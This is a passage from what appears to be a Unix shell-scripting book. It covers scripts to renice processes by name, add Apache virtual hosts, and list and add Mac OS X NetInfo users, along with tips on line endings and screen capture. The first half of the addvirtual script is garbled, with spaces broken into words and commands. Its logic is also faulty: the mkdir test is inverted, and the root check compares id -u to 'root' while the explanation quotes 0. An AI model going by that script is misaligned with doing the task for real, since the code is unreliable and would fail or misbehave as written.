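For example, the lapse between two successive readings is then just shell arithmetic (the timestamps below are two adjacent time= values from the sample log shown earlier, ten minutes apart):

```shell
# Two adjacent time= readings from netstat.log
prev=1063982400
curr=1063983000
echo "seconds between readings: $(( curr - prev ))"
```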

#91 Renicing Tasks by Process Name


There are many times when it's useful to change the priority of a specific task, whether it's an IRC or chat server that's
supposed to use only "spare" cycles, an MP3 player app or file download that has become less important, or a real-time
CPU monitor being increased in priority. The renice command, however, requires you to specify the process
ID, which can be a hassle. A much more useful approach is to have a script that matches process name to process ID
and then renices the specified application.
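The core of that mapping is a ps-to-awk pipeline; here's a sketch run against simulated ps output (the user, PIDs, and column layout are hypothetical, standing in for real 'ps cu' output):

```shell
# The awk pattern picks the PID (column 2) of any line whose text
# matches the requested process name
printf '%s\n' \
  'USER    PID %CPU %MEM COMMAND' \
  'taylor  10949 0.0 1.2 vim' \
  'taylor  11152 0.0 0.1 ps' |
  awk '/vim/ { print $2 }'
```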

The Code
#!/bin/sh

# renicename - Renices the job that matches the specified name.

user=""; tty=""; showpid=0; niceval="+1"     # initialize

while getopts "n:u:t:p" opt; do
  case $opt in
    n ) niceval="$OPTARG";             ;;
    u ) if [ ! -z "$tty" ] ; then
          echo "$0: error: -u and -t are mutually exclusive." >&2
          exit 1
        fi
        user=$OPTARG                   ;;
    t ) if [ ! -z "$user" ] ; then
          echo "$0: error: -u and -t are mutually exclusive." >&2
          exit 1
        fi
        tty=$OPTARG                    ;;
    p ) showpid=1;                     ;;
    ? ) echo "Usage: $0 [-n niceval] [-u user|-t tty] [-p] pattern" >&2
        echo "Default niceval change is \"$niceval\" (plus is lower" >&2
        echo "priority, minus is higher, but only root can go below 0)" >&2
        exit 1
  esac
done
shift $(($OPTIND - 1))   # eat all the parsed arguments

if [ $# -eq 0 ] ; then
  echo "Usage: $0 [-n niceval] [-u user|-t tty] [-p] pattern" >&2
  exit 1
fi

if [ ! -z "$tty" ] ; then
  pid=$(ps cu -t $tty | awk "/$1/ { print \$2 }")
elif [ ! -z "$user" ] ; then
  pid=$(ps cu -U $user | awk "/$1/ { print \$2 }")
else
  pid=$(ps cu -U ${USER:-LOGNAME} | awk "/$1/ { print \$2 }")
fi

if [ -z "$pid" ] ; then
  echo "$0: no processes match pattern $1" >&2 ; exit 1
elif [ ! -z "$(echo $pid | grep ' ')" ] ; then
  echo "$0: more than one process matches pattern ${1}:"
  if [ ! -z "$tty" ] ; then
    runme="ps cu -t $tty"
  elif [ ! -z "$user" ] ; then
    runme="ps cu -U $user"
  else
    runme="ps cu -U ${USER:-LOGNAME}"
  fi
  eval $runme | \
    awk "/$1/ { printf \"  user %-8.8s  pid %-6.6s  job %s\n\", \$1, \$2, \$11 }"
  echo "Use -u user or -t tty to narrow down your selection criteria."
elif [ $showpid -eq 1 ] ; then
  echo $pid
else
  # ready to go: let's do it!
  echo -n "Renicing job \""
  echo -n $(ps cp $pid | sed 's/ [ ]*/ /g' | tail -1 | cut -d\  -f5-)
  echo "\" ($pid)"
  renice $niceval $pid
fi

exit 0

How It Works
This script borrows liberally from the earlier Script #52, Killing Processes by Name, which does a similar mapping of
process name to process ID, but then kills the jobs, rather than just lowering their priority.
In this situation, you don't want to accidentally renice a number of matching processes (imagine renicename -n 10
"*", for example), so the script fails if more than one process matches the criteria. Otherwise, it makes the change
specified and lets the actual renice program report any errors that may have been encountered.
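The multiple-match test itself is worth a closer look: when several processes match, the PIDs come back space separated, so grepping for a space flags the ambiguous case (the PID values below are hypothetical):

```shell
pid="10581 10949"   # what the ps/awk pipeline returns when two processes match

# A space inside $pid means more than one PID was found
if [ ! -z "$(echo $pid | grep ' ')" ] ; then
  echo "more than one process matches"
fi
```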

Running the Script


You have a number of different possible options when running this script: -n val allows you to specify the desired
nice (job priority) value. The default is specified as niceval=+1. The -u user flag allows matching processes to
be limited by user, while -t tty allows a similar filter by terminal name. To see just the matching process ID and not
actually renice the application, use the -p flag. In addition to one or more flags, renicename requires a command
pattern that will be compared to the running process names on the system to ascertain which of the processes match.

The Results
First off, here are the results when there is more than one matching process:

$ renicename "vim"
renicename: more than one process matches pattern vim:
  user taylor    pid 10581   job vim
  user taylor    pid 10949   job vim
Use -u user or -t tty to narrow down your selection criteria.

I subsequently quit one of these processes and ran the same command:

$ renicename "vim"
Renicing job "vim" (10949)
10949: old priority 0, new priority 1
We can confirm that this worked by using the -alr (or -al) flags to ps:

$ ps -alr
  UID   PID  PPID CPU PRI NI    VSZ  RSS STAT TT       TIME COMMAND
    0   439   438   0  31  0  14048  568 Ss   std   0:00.84 login -pf taylor
  501   440   439   0  31  0   1828  756 S    std   0:00.56 -bash (bash)
    0 10577   438   0  31  0  14048  572 Ss   p2    0:00.83 login -pf taylor
  501 10578 10577   0  31  0   1828  760 S    p2    0:00.16 -bash (bash)
  501 10949 10578   0  30  1  11004 2348 SN+  p2    0:00.09 vim reniceme
    0 11152   440   0  31  0   1372  320 R+   std   0:00.01 ps -alr
Notice that the vim process (10949) has a nice value (the NI column) of 1, while everything else I'm running has a
nice value of 0, the standard user priority level.

Hacking the Script


An interesting addendum to this script is another script that watches for certain programs to be launched and
automatically renices them to a set priority; this can be helpful if certain Internet services or applications tend to
consume most of the CPU resources, for example. The script uses renicename to map process name to process
ID and then checks the process's current nice level and issues a renice if the nice level specified as a command
argument is higher (a lesser priority) than the current level:
#!/bin/sh

# watch_and_nice - Watches for the specified process name, and renices it
#   to the desired value when seen.

renicename="$HOME/bin/renicename"

if [ $# -ne 2 ] ; then
  echo "Usage: $(basename $0) desirednice jobname" >&2
  exit 1
fi

pid="$($renicename -p "$2")"

if [ ! -z "$(echo $pid | sed 's/[0-9]*//g')" ] ; then
  echo "Failed to make a unique match in the process table for $2" >&2
  exit 1
fi

currentnice="$(ps -lp $pid | tail -1 | awk '{ print $6 }')"

if [ $1 -gt $currentnice ] ; then
  echo "Adjusting priority of $2 to $1"
  renice $1 $pid
fi

exit 0
Within a cron job, this script could be used to ensure that certain apps are pushed to the desired priority within a few
minutes of being launched.
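For instance, a hypothetical crontab entry (the path and job name here are assumptions, following the getstats crontab example earlier in this chapter) might check every five minutes:

```
*/5 * * * * /home/taylor/bin/watch_and_nice 10 mp3player
```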

#92 Adding New Virtual Host Accounts


This script is particularly useful for web administrators who serve a number of different domains and websites from a
single server. A great way to accomplish this is by using virtual hosting, a capability of Apache (and many other web
servers) to assign multiple domain names to the same IP address and then split them back into individual sites within
the Apache configuration file.
Just as adding a new account on a private machine requires the creation of a new home directory, creating a new
virtual host account requires creating a separate home for both the web pages themselves and the resultant log files.
The material added is straightforward and quite consistent, so it's a great candidate for a shell script.

The Code
# !/ bin / sh
# a ddv i rtu al - Ad ds a vir tual h ost t o a n Ap ac he co nf i gu r at io n f il e .
# Y ou' l l w an t t o modi fy a ll of the s e to p oi nt t o t he pr o pe r d ir ec t or ie s
d oc roo t ="/ et c/h tt pd/h tml"
l og roo t ="/ va r/l og /htt pd/"
h tt pco n f=" /e tc/ ht tpd/ conf /http d .co n f "
# S ome sit es us e 'apa chec tl' r a the r tha n re st ar t _a pa c he :
r es tar t ="/ us r/l oc al/b in/r estar t _ap a c he"
s ho won l y=0 ; tem po ut=" /tmp /addv i rtu a l .$$ "
t ra p " r m - f $te mp out $tem pout. 2 " 0
i f [ " $ 1" = "-n " ] ; then
s how o nly =1 ; sh ift
fi
i f [ $ # -n e 3 ] ; the n
e cho "Us ag e: $( base name $0) [ -n] d oma i n a dm in - em ai l o w ne r- i d" > & 2
e cho "
Wh ere - n sh ows what i t w o u ld d o , bu t d oe sn ' t d o an y th in g " >& 2
e xit 1
fi
# C hec k fo r com mo n an d pr obabl e er r o rs
i f [ $ ( id -u ) ! = "roo t" - a $sh o won l y = 0 ] ; th e n
e cho "Er ro r: $( base name $0) c an o n ly b e r un a s r oo t ." >& 2
e xit 1
fi
i f [ ! -z "$ (ec ho $1 | gr ep -E '^w w w \.' ) " ] ; t h en
e cho "Pl ea se om it t he w ww. p r efi x on t h e do ma i n na m e" >& 2
e xit 0
fi
i f [ " $ (ec ho $1 | sed 's/ //g' ) " ! = "$1 " ] ; th e n
e cho "Er ro r: Do main nam es ca n not h ave s pa ce s. " > &2
e xit 1
fi
i f [ - z "$ (g rep - E "^ $3" /etc/ p ass w d )" ] ; th en
e cho "Ac co unt $ 3 no t fo und i n pa s s wor d fi le " > &2
e xit 1
fi
# B uil d th e dir ec tory str uctur e an d dro p a fe w f il es th e re in
i f [ $ s how on ly -e q 1 ] ; then
t emp o ut= "/ dev /t ty"
# t o out p ut v i rtu a l ho st t o s td o ut
e cho "mk di r $ do croo t/$1 $log r oot / $ 1"
e cho "ch ow n $ 3 $doc root /$1 $ l ogr o o t/$ 1 "
e ls e

i f [ ! - d $do cr oot/ $1 ] ; th e n
if mkd ir $d oc root /$1 ; the n
e cho " Fai le d on mkd ir $d o cro o t /$1 : ex it in g ." > & 2 ; e xi t 1
fi
fi
i f [ ! - d $lo gr oot/ $1 ] ; th e n
mk d ir $l ogr oo t/$1
if [ $ ? -ne 0 -a $? - ne 17 ] ; t hen
# er ro r c od e 17 = d irect o ry a l rea d y e xi st s
e cho " Fai le d on mkd ir $d o cro o t /$1 : ex it in g ." > & 2 ; e xi t 1
fi
fi
c how n $3 $ doc ro ot/$ 1 $l ogroo t /$1
fi
# Now let's drop the necessary block into the httpd.conf file

cat << EOF > $tempout
####### Virtual Host setup for $1 ###########
<VirtualHost www.$1 $1>
ServerName www.$1
ServerAdmin $2
DocumentRoot $docroot/$1
ErrorLog logs/$1/error_log
TransferLog logs/$1/access_log
</VirtualHost>

<Directory $docroot/$1>
Options Indexes FollowSymLinks Includes
AllowOverride All
order allow,deny
allow from all
</Directory>
EOF

if [ $showonly -eq 1 ]; then
  echo "Tip: Copy the above block into $httpconf and"
  echo "restart the server with $restart and you're done."
  exit 0
fi
# Let's hack the httpd.conf file

date="$(date +%m%d%H%M)"        # month day hour minute
cp $httpconf $httpconf.$date    # backup copy of config file

# Figure out what line in the file has the last </VirtualHost> entry.
# Yes, this means that the script won't work if there are NO virtual host
# entries already in the httpd.conf file. If there are no entries, just use
# the -n flag and paste the material in manually...

addafter="$(cat -n $httpconf | grep '</VirtualHost>' | awk 'NR==1 {print $1}')"
if [ -z "$addafter" ]; then
  echo "Error: Can't find a </VirtualHost> line in $httpconf" >&2
  /bin/rm -f $httpconf.$date ; exit 1
fi

sed "${addafter}r $tempout" < $httpconf > $tempout.2
mv $tempout.2 $httpconf
if ! $restart ; then
  mv $httpconf $httpconf.failed.$date
  mv $httpconf.$date $httpconf
  $restart
  echo "Configuration appears to have failed; restarted with old config" >&2
  echo "Failed configuration is in $httpconf.failed.$date" >&2
  exit 1
fi

exit 0

How It Works
Though long, this script is quite straightforward, as most of it is focused on various output messages. The error
condition checks in the first section are complex conditionals that are worth exploring. The most complex of them
checks the ID of the user running the script:
if [ "$(id -u)" != 0 -a $showonly = 0 ]; then
This test can be paraphrased as, If you aren't root, and you haven't specified that you want only the commands
displayed on the terminal, then ...
After each Unix command, this script checks the return code to ensure that things went well, which catches most of the
common errors. The one error not caught this way occurs if there's no chown command or if the chown command
can be run only by root. If that's the case, simply comment out the following line, or alter it to work properly:
chown $3 $docroot/$1 $logroot/$1
In a similar way, many web hosting companies have their own preferred set of entries in a VirtualHost block, and
perhaps a more restrictive Directory privilege set than the one specified in this script. In both cases, fine-tuning the
script once ensures that all subsequent accounts are created with exactly the right permissions and configuration.
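For instance, a site that prefers locked-down defaults might swap in a Directory block like the following sketch. The specific directive values here are illustrative choices, not something the script itself prescribes:

```
<Directory $docroot/$1>
Options FollowSymLinks
AllowOverride None
order allow,deny
allow from all
</Directory>
```

Dropping Indexes prevents automatic directory listings, and AllowOverride None keeps users from changing server behavior with .htaccess files.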
The script takes particular pains to avoid leaving you with a corrupted httpd.conf file (which could be disastrous): It
copies the content in the current httpd.conf file to a backup file (httpd.conf.MMDDHHMM, e.g.,
httpd.conf.10031118), injects the new VirtualHost and Directory blocks into the live httpd.conf
file, and then restarts the web server. If the server restart returns without an error, all is well, and the old config file is
kept for archival purposes. If the restart fails, however, the following code is executed:
if ! $restart ; then
  mv $httpconf $httpconf.failed.$date
  mv $httpconf.$date $httpconf
  $restart
  echo "Configuration appears to have failed; restarted with old config" >&2
  echo "Failed configuration is in $httpconf.failed.$date" >&2
  exit 1
fi
The live httpd.conf file is moved to httpd.conf.failed.MMDDHHMM, and the old httpd.conf file, now
saved as httpd.conf.MMDDHHMM, is moved back into place. The web server is started once again, and an error
message is output.
These hoops, as shown in the snippet just given, ensure that, whether the VirtualHost addition is successful or
not, a copy of both the original and edited httpd.conf files remains in the directory. The only stumbling block with
this technique occurs if the restart command doesn't return a nonzero return code upon failure. If this is the case,
it's well worth lobbying the developer to have it fixed, but in the meantime, if the script thinks that the restart went
fine but it didn't, you can jump into the conf directory, move the new httpd.conf file to
httpd.conf.failed.MMDDHHMM, move the old version of the configuration file, now saved as
httpd.conf.MMDDHHMM, back to httpd.conf, and then restart by hand.
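The injection step itself relies on sed's r command, which reads a file's contents in immediately after a given line number. Here's a minimal, self-contained sketch of that technique, using throwaway temp files rather than a real httpd.conf:

```shell
#!/bin/sh
# Demonstrate the "${linenum}r file" sed idiom used to splice the new
# VirtualHost block into the config file.

conf="$(mktemp)" ; block="$(mktemp)"
printf '%s\n' 'line one' '</VirtualHost>' 'line three' > "$conf"
printf '%s\n' '# injected block' > "$block"

# Locate the line number of the first matching line, as the script does
addafter="$(cat -n "$conf" | grep '</VirtualHost>' | awk 'NR==1 {print $1}')"

# Read the block file in immediately after that line
sed "${addafter}r $block" < "$conf"

rm -f "$conf" "$block"
```

Run against the sample file, the injected comment lands directly after the </VirtualHost> line, which is exactly what happens to the heredoc block in the real script.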

Running the Script


This script requires three arguments: the name of the new domain, the email address of the administrator for Apache
error message pages, and the account name of the user who is going to own the resultant directories. To have the
output displayed onscreen rather than actually modifying your httpd.conf file, include the -n flag. Note that you
will doubtless need to modify the value of the first few variables in the script to match your own configuration before
you proceed.

The Results
Because the script doesn't have any interesting output when no errors are encountered, let's look at the "show, but
don't do" output instead by specifying the -n flag to addvirtual:
$ addvirtual -n baby.net admin@baby.net taylor
mkdir /etc/httpd/html/baby.net /var/log/httpd//baby.net
chown taylor /etc/httpd/html/baby.net /var/log/httpd//baby.net

####### Virtual Host setup for baby.net ###########
<VirtualHost www.baby.net baby.net>
ServerName www.baby.net
ServerAdmin admin@baby.net
DocumentRoot /etc/httpd/html/baby.net
ErrorLog logs/baby.net/error_log
TransferLog logs/baby.net/access_log
</VirtualHost>

<Directory /etc/httpd/html/baby.net>
Options Indexes FollowSymLinks Includes
AllowOverride All
order allow,deny
allow from all
</Directory>
Tip: Copy the above block into /etc/httpd/conf/httpd.conf and
restart the server with /usr/local/bin/restart_apache and you're done.

Hacking the Script


There are two additions to the script that would be quite useful: First, create a new website directory and automatically
copy in an index.html and perhaps a custom 404 error page, replacing in the 404 error page a specific string like
%%domain%% with the new domain name, and %%adminemail%% with the email address of the administrator.
A second useful addition would be to test and possibly refine the restart testing; if your restart program
doesn't return a nonzero value on failure, you could capture the output and search for specific words (like "failed" or
"error") to ascertain success or failure. Or immediately after restarting, use ps | grep to see if httpd is running, and
respond appropriately.
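That last idea might look something like the following sketch. The grep -v grep is needed because the grep process itself would otherwise match its own pattern in the ps listing, and the daemon name httpd is an assumption that may differ on your system:

```shell
#!/bin/sh
# After a restart, verify that an httpd process actually exists.

if ps ax | grep httpd | grep -v grep > /dev/null ; then
  echo "httpd appears to be running."
else
  echo "No httpd process found: restoring the old configuration is probably wise." >&2
fi
```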

Chapter 11: Mac OS X Scripts


Overview
One of the most important changes in the world of Unix and Unix-like operating systems was the release of the
completely rewritten Apple Mac OS X system. Jumping from the older Mac OS 9, Mac OS X is built atop a solid and
reliable Unix core called Darwin. Darwin is an open source Unix based on BSD Unix, and if you know your Unix at all,
the first time you open the Terminal application in Mac OS X you'll doubtless gasp and swoon with delight. Everything
you'd want, from development tools to standard Unix utilities, is included with the latest generation of Macintosh
computers, with a gorgeous GUI quite capable of hiding all that power for people who aren't ready for it.
There are some significant differences between Mac OS X and Linux/Unix, however, not the least of which is that Mac
OS X uses a system database called NetInfo as a replacement for a number of flat information files, notably
/etc/passwd and /etc/aliases. This means that if you want to add a user to the system, for example, you
have to inject his or her information into the NetInfo database, not append it to the /etc/passwd file.
Additional changes are more on the fun and interesting side, fortunately. One tremendously popular Mac OS X
application that many people adore is iTunes, an elegant and powerful MP3 player and online radio tuner application.
Spend enough time with iTunes, though, and you'll find that it's very hard to keep track of what songs are on your
system. Similarly, Mac OS X has an interesting command-line application called open, which allows you to launch
graphical ("Aqua" in Mac OS X parlance) applications from the command line. But open could be more flexible than it
is, so a wrapper helps a lot.
There are other Mac OS X tweaks that can help you in your day-to-day interaction. For example, if you work on the
command line with files created for the GUI side of the Macintosh, you'll quickly find that the end-of-line character in
these files isn't the same as the character you need when working on the command line. In technical parlance, Aqua
systems have end-of-line carriage returns (notationally, an \r character), while the Unix side wants newlines (an \n).
Instead of a file in which each line is displayed one after the other, a Mac Aqua file will show up in the Terminal without
the proper line breaks. Have a file that's suffering from this problem? Here's what you'd see if you tried to cat it:
$ cat mac-format-file.txt
$
Yet you know there's content. To see that there's content, use the -v flag to cat, which makes all otherwise hidden
control characters visible. Suddenly you see something like this:
$ cat -v mac-format-file.txt
The rain in Spain^Mfalls mainly on^Mthe plain.^MNo kidding. It does.^M$
Clearly there's something wrong! Fortunately, it's easy to fix with tr:
$ tr '\r' '\n' < mac-format-file.txt > unix-format-file.txt
Once this is applied to the sample file, things start to make a lot more sense:
$ tr '\r' '\n' < mac-format-file.txt
The rain in Spain
falls mainly on
the plain.
No kidding. It does.
If you open up a Unix file in a Mac application like Microsoft Word and it looks all wonky, you can also switch end-of-line
characters in the other direction, toward an Aqua application:
$ tr '\n' '\r' < unixfile.txt > macfile.txt
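If you do these conversions often, the two tr invocations are worth wrapping up. Here's a sketch as a pair of shell functions; the names mac2unix and unix2mac are just illustrative:

```shell
# mac2unix/unix2mac - Convert line endings, writing the result to stdout
#   so the original file is never touched.

mac2unix()
{
  tr '\r' '\n' < "$1"
}

unix2mac()
{
  tr '\n' '\r' < "$1"
}
```

You'd then use mac2unix mac-format-file.txt > unix-format-file.txt and the reverse for unix2mac.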
One last little snippet before we get into the specific scripts for this chapter: easy screen shots in the world of Mac OS
X. If you've used the Mac for any length of time, you've already learned that it has a built-in screen capture capability
that you access by pressing CMD-SHIFT-3. You can also use the Mac OS X utility Grab, located in the
Applications/Utilities folder, and there are some excellent third-party choices, including Ambrosia Software's Snapz
Pro X, which I've used for the screen shots in this book.
However, did you know that there's a command-line alternative too? There's no man page for it, but
screencapture can take shots of the current screen and save them to the Clipboard or to a specific named file (in
JPEG or TIFF format). Type in the command without any arguments, and you'll see the basics of its operation:

$ screencapture
screencapture: illegal usage, file required if not going to clipboard
usage: screencapture [-icmwsWx] [file] [cursor]
  -i      capture screen interactively, by selection or window
            control key - causes screen shot to go to clipboard
            space key   - toggle between mouse selection and
                          window selection modes
            escape key  - cancels interactive screen shot
  -c      force screen capture to go to the clipboard
  -m      only capture the main monitor, undefined if -i is set
  -w      only allow window selection mode
  -s      only allow mouse selection mode
  -W      start interaction in window selection mode
  -x      do not play sounds
  file    where to save the screen capture
This is an application begging for a wrapper script. For example, to take a shot of the screen 30 seconds in the future,
you could use
$ sleep 30; screencapture capture.tiff
But what if you wanted to take a series of screen shots, spaced one minute apart? A simple loop would work:
maxshots=60; counter=0
while [ $counter -lt $maxshots ] ; do
  screencapture capture${counter}.tiff
  counter=$((counter + 1))
  sleep 60
done
This will take a screen shot every 60 seconds for 1 hour, creating 60 rather large TIFF files, over 1.5MB each,
sequentially numbered capture0.tiff, capture1.tiff, ... capture59.tiff. This could be very useful
for training purposes, or perhaps you're suspicious that someone has been using your computer while you're at lunch:
Set this up, and you can go back and review what occurred without anyone ever knowing.
Let's look at some more complex scripts for Mac OS X.

#93 List NetInfo Users


To begin seeing how to work with NetInfo, here's a straightforward script that allows you to easily interface with the
NetInfo database through the nireport utility.

The Code
#!/bin/sh
# listmacusers - Simple script to list users in the Mac OS X NetInfo database.
#   Note that Mac OS X also has an /etc/passwd file, but that's
#   used only during the initial stages of boot time and for
#   recovery bootups. Otherwise, all data is in the NetInfo db.

fields=""

while getopts "Aahnprsu" opt ; do
  case $opt in
    A ) fields="uid passwd name realname home shell"  ;;
    a ) fields="uid name realname home shell"         ;;
    h ) fields="$fields home"                         ;;
    n ) fields="$fields name"                         ;;
    p ) fields="$fields passwd"                       ;;
    r ) fields="$fields realname"                     ;;
    s ) fields="$fields shell"                        ;;
    u ) fields="$fields uid"                          ;;
    ? ) cat << EOF >&2
Usage: $0 [A|a|hnprsu]
Where:
  -A    output all known NetInfo user fields
  -a    output only the interesting user fields
  -h    show home directories of accounts
  -n    show account names
  -p    passwd (encrypted)
  -r    show realname/fullname values
  -s    show login shell
  -u    uid
EOF
        exit 1
  esac
done

exec nireport . /users ${fields:=uid name realname home shell}

How It Works
Almost this entire script is involved in building the variable fields, which starts out blank. The nireport utility
allows you to specify the names of the fields you'd like to see, and so, for example, if the user specifies -a for all
interesting fields, nireport actually is fed
fields="uid name realname home shell"
This is a clear, straightforward script that should be quite easily understood.

Running the Script


The listmacusers script accepts quite a few different command arguments, as shown in the usage message. You
can specify exact fields and field order by using -hnprsu, or you can list all fields except the encrypted password field
with -a or force everything to be listed with -A. Without any arguments, the default behavior is to show all interesting
user fields (-a).

The Results
First off, let's specify that we want to see the user ID, login name, real name, and login shell for every account in the

NetInfo database:
$ listmacusers -u -n -r -s
-2    nobody   Unprivileged User            /dev/null
0     root     System Administrator         /bin/tcsh
1     daemon   System Services              /dev/null
99    unknown  Unknown User                 /dev/null
25    smmsp    Sendmail User                /dev/null
70    www      World Wide Web Server        /dev/null
74    mysql    MySQL Server                 /dev/null
75    sshd     sshd Privilege separation    /dev/null
505   test3    Mr. Test Three               /bin/tcsh
501   taylor   Dave Taylor                  /bin/bash
502   badguy   Test Account                 /bin/tcsh
503   test                                  /bin/tcsh
506   tintin   Tintin, Boy Reporter         /bin/tcsh
507   gary     Gary Gary                    /bin/bash
Notice that it shows many of the administrative accounts (basically everything with a login shell of /dev/null). If we
want to see only login accounts, we'll want to screen out the /dev/null shells:
$ listmacusers -u -n -r -s | grep -v /dev/null
0     root     System Administrator     /bin/tcsh
505   test3    Mr. Test Three           /bin/tcsh
501   taylor   Dave Taylor              /bin/bash
502   badguy   Test Account             /bin/tcsh
503   test                              /bin/tcsh
506   tintin   Tintin, Boy Reporter     /bin/tcsh
507   gary     Gary Gary                /bin/bash
The badguy account isn't supposed to be there! To find out what's going on there, and to modify NetInfo entries, it's
wise to use the Apple-supplied NetInfo Manager application, which can be found in Applications/Utilities or launched
from the command line with the command
open -a "NetInfo Manager"

#94 Adding a User to a Mac OS X System


Earlier in the book, in Script #44, you saw the basic steps involved in adding a new user to a typical Unix or Linux
system. The Mac OS X version is fundamentally quite similar. In essence, you prompt for an account name and login
shell, append the appropriate information to the /etc/passwd and /etc/shadow files, create the new user's
home directory, and set an initial password of some sort. With Mac OS X it's not quite this simple, because appending
information to /etc/passwd will not create a new Aqua account. Instead, the information must be injected into the
NetInfo system using the niutil command.

The Code
#!/bin/sh
# addmacuser - Adds a new user to the system, including building the
#   home directory, copying in default config data, etc.
#
#   You can choose to have every user in his or her own group (which requires
#   a few tweaks) or use the default behavior of having everyone put
#   into the same group. Tweak dgroup and dgid to match your own config.

dgroup="guest"; dgid=31      # default group and groupid
hmdir="/Users"
shell="uninitialized"

if [ "$(/usr/bin/whoami)" != "root" ] ; then
  echo "$(basename $0): You must be root to run this command." >&2
  exit 1
fi

echo "Add new user account to $(hostname)"
echo -n "login: " ; read login

if nireport . /users name | sed 's/[^[:alnum:]]//g' | grep "^$login$" ; then
  echo "$0: You already have an account with name $login" >&2
  exit 1
fi

uid1="$(nireport . /users uid | sort -n | tail -1)"
uid="$(($uid1 + 1))"
homedir=$hmdir/$login

echo -n "full name: " ; read fullname

until [ -z "$shell" -o -x "$shell" ] ; do
  echo -n "shell: " ; read shell
done

echo "Setting up account $login for $fullname..."
echo "uid=$uid gid=$dgid
shell=$shell home=$homedir"

niutil -create     . /users/$login
niutil -createprop . /users/$login passwd
niutil -createprop . /users/$login uid $uid
niutil -createprop . /users/$login gid $dgid
niutil -createprop . /users/$login realname "$fullname"
niutil -createprop . /users/$login shell $shell
niutil -createprop . /users/$login home $homedir
niutil -createprop . /users/$login _shadow_passwd ""

# adding them to the $dgroup group
niutil -appendprop . /groups/$dgroup users $login

if ! mkdir -m 755 $homedir ; then
  echo "$0: Failed making home directory $homedir" >&2
  echo "(created account in NetInfo database, though. Continue by hand)" >&2
  exit 1
fi

if [ -d /etc/skel ] ; then
  ditto /etc/skel/.[a-zA-Z]* $homedir
else
  ditto "/System/Library/User Template/English.lproj" $homedir
fi

chown -R ${login}:$dgroup $homedir

echo "Please enter an initial password for $login:"
passwd $login

echo "Done. Account set up and ready to use."
exit 0

How It Works
This script checks to ensure that it's being run by root (a non-root user would generate permission errors with each
call to niutil and the mkdir calls, and so on) and then uses the following test to check whether the specified
account name is already present in the system:
nireport . /users name | sed 's/[^[:alnum:]]//g' | grep "^$login$"
You've already seen in Script #93 that nireport is the easy way to interface with the NetInfo system, so it should be
straightforward that this call generates a list of account names. It uses sed to strip all spaces and tabs and then uses
grep to search for the specified login name, left rooted (^ is the beginning of the line) and right rooted ($ is the end
of the line). If this test succeeds, the script outputs an error and quits.
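The effect of those anchors is easy to see in isolation. Without them, a login such as test would also match test3; the sample names below are invented for the demonstration:

```shell
#!/bin/sh
# Show why the grep pattern is anchored on both ends.

names="root
test
test3
taylor"

echo "Unanchored matches for 'test':"
echo "$names" | grep "test"        # matches test AND test3

echo "Anchored matches for '^test\$':"
echo "$names" | grep "^test$"      # matches only the exact login
```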
The script also uses nireport to extract the highest user ID value in the NetInfo database and then increments it by
1 to generate the new account ID value:
uid1="$(nireport . /users uid | sort -n | tail -1)"
uid="$(($uid1 + 1))"
Notice the use of the -n flag with sort to ensure that sort organizes its results from lowest to highest (you can
reverse it with -nr instead, but that wouldn't work in this context), and then the use of tail -1 to pull off just the
highest uid on the list.
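The sort -n | tail -1 idiom for picking the next free ID works on any numeric list; here's a self-contained sketch with a hardcoded list standing in for the nireport output:

```shell
#!/bin/sh
# Compute highest-existing-uid-plus-one, as the script does with NetInfo data.

uids="70
501
505
502"

uid1="$(echo "$uids" | sort -n | tail -1)"   # highest uid in the list
uid="$(($uid1 + 1))"                         # next free uid

echo "next available uid: $uid"
```

Note that a plain sort without -n would compare the values as strings, putting 70 after 505 and breaking the logic.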
The user is then prompted to enter a login shell over and over until either it's matched to an executable program or it's
ascertained to be an empty string (empty strings default to /bin/sh as the login shell):
until [ -z "$shell" -o -x "$shell" ] ; do
  echo -n "shell: " ; read shell
done
And finally we're ready to create the actual account in the NetInfo database with niutil. The first line creates an
entry for the account in NetInfo, using -create, and the subsequent account attributes are added with
-createprop. Notice that a special _shadow_passwd field is created, though its value is left as null. This is
actually a placeholder for the future: NetInfo doesn't store the encrypted password in a secret place. Yet.
Instead of using cp -R to install user files and directories into the new account, the script uses a Mac OS X-specific
utility called ditto. The ditto command ensures that any files that might have special resource forks (an Aqua-ism)
are copied intact.
Finally, to force the password to be set, the script simply calls passwd with the special notation that only the root user
can utilize: passwd account, which sets the password for the specified account.

Running the Script


This script prompts for input, so no command flags or command-line arguments are necessary.

The Results
$ addmacuser
addmacuser: You must be root to run this command.
Like any administrative command, this one must be run as root rather than as a regular user. This is easily solved
with the sudo command:
$ sudo addmacuser
Add new user account to TheBox.local
login: gareth
full name: Gareth Taylor
shell: /bin/bash
Setting up account gareth for Gareth Taylor...
uid=508 gid=31
shell=/bin/bash home=/Users/gareth
Please enter an initial password for gareth:
Changing password for gareth.
New password:
Retype new password:
Done. Account set up and ready to use.

That's all there is to it. Figure 11-1 shows the login window with account gareth as one of the choices.

Figure 11-1: Login window with Gareth's account included

Hacking the Script


Probably the greatest adjustment that might be required for this script is to change the group membership model.
Currently the script is built to add all new users to the guest group, with the group ID specified as dgid at the
beginning of the script. While many installations might work fine with this setup, other Mac OS X sites emulate the
Linux trick of having every user in his or her own group. To accomplish that, you'd want to add a block of new code
that auto-generates a group ID one value higher than the largest group ID currently in the NetInfo database and then
instantiates the new group using the niutil command:
niutil -create . /groups/$login

Another nice hack might be to automatically email new users a welcome message, so that when they first open up
their mailer there are some basic instructions on how to work with the system, what the default printer is, and any
usage and network access policies.

#95 Adding an Email Alias


While Mac OS X does include a standard Unix mail transport system built around the venerable and remarkably
complex sendmail system, it doesn't enable this system by default. Enabling it requires a number of steps too
involved to cover in this book. If you do have sendmail running on your Mac OS X box,
however, you'll doubtless want to be able to add mail aliases in a simple manner. But mail aliases aren't in
/etc/aliases anymore; they're now part of the NetInfo system. This script offers an easy work-around.
Setting up sendmail

A variety of sites offer instructions on how to set up sendmail on your Mac OS X system, and some simple
freeware applications are even available to set it up automatically. If you want to do it yourself, go to O'Reilly's
MacDevCenter at http://www.macdevcenter.com/ and search for "sendmail," or take the easy way out and go to
Version Tracker at http://www.versiontracker.com/ and, again, search for "sendmail" to find a variety of freeware
configuration utilities. Make sure the solution you try is for your exact version of Mac OS X.

The Code
#!/bin/sh
# addmacalias - Adds a new alias to the email alias database on Mac OS X.
#   This presumes that you've enabled sendmail, which can be kind of
#   tricky. Go to http://www.macdevcenter.com/ and search for "sendmail"
#   for some good reference works.

showaliases="nidump aliases ."

if [ "$(/usr/bin/whoami)" != "root" ] ; then
  echo "$(basename $0): You must be root to run this command." >&2
  exit 1
fi

if [ $# -eq 0 ] ; then
